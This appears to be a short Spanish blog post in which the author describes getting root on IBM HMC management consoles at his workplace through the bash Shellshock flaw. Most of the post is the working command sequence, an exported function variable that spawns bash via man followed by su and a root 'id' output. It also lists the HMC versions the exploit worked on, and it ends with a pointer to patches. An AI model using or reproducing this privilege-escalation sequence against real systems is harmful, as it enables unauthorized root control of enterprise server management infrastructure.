IBM HMC Shellshock Hacked

Donde trabajo tenemos 4 hmc’s para administrar 3 IBM P5 system’s y 2 ISeries 770, y ya tenia tiempo queriendo ser root en esas consolas (because I can), anteriormente lo logre por este método Escaping HMC Restricted Shell y ahora a travéz de la falla de bash (shellshock).

Solo debes hacer login con tu usuario hscroot y en la consola ejecutar:

hscroot@HCM03:~> x='() { :;}; /bin/bash’; export x; man
hscroot@HCM03:~> /bin/su –
Password: (La clave de hscroot)
HCM03:~ # id
uid=0(root) gid=0(root) groups=0(root)

Esto me funciono para las versiones:

hscroot@HCM03:~> lshmc -V
“version= Version: 7
Release: 7.6.0
Service Pack: 3
HMC Build level 20130610.1
“,”base_version=V7R7.6.0”

y

hmcdr:~ # lshmc -V
“version= Version: 7
Release: 3.4.0
Service Pack: 3
HMC Build level 20090709.1
MH01211: Fix for Backup/Restore CCD (03-02-2010)
MH01207: Fix for multi-volume updates using ISO files not burned as images. (12-07-2009)
“,”base_version=V7R3.4.0”

En este link están los parches referentes a las hmc www.ixbrian.com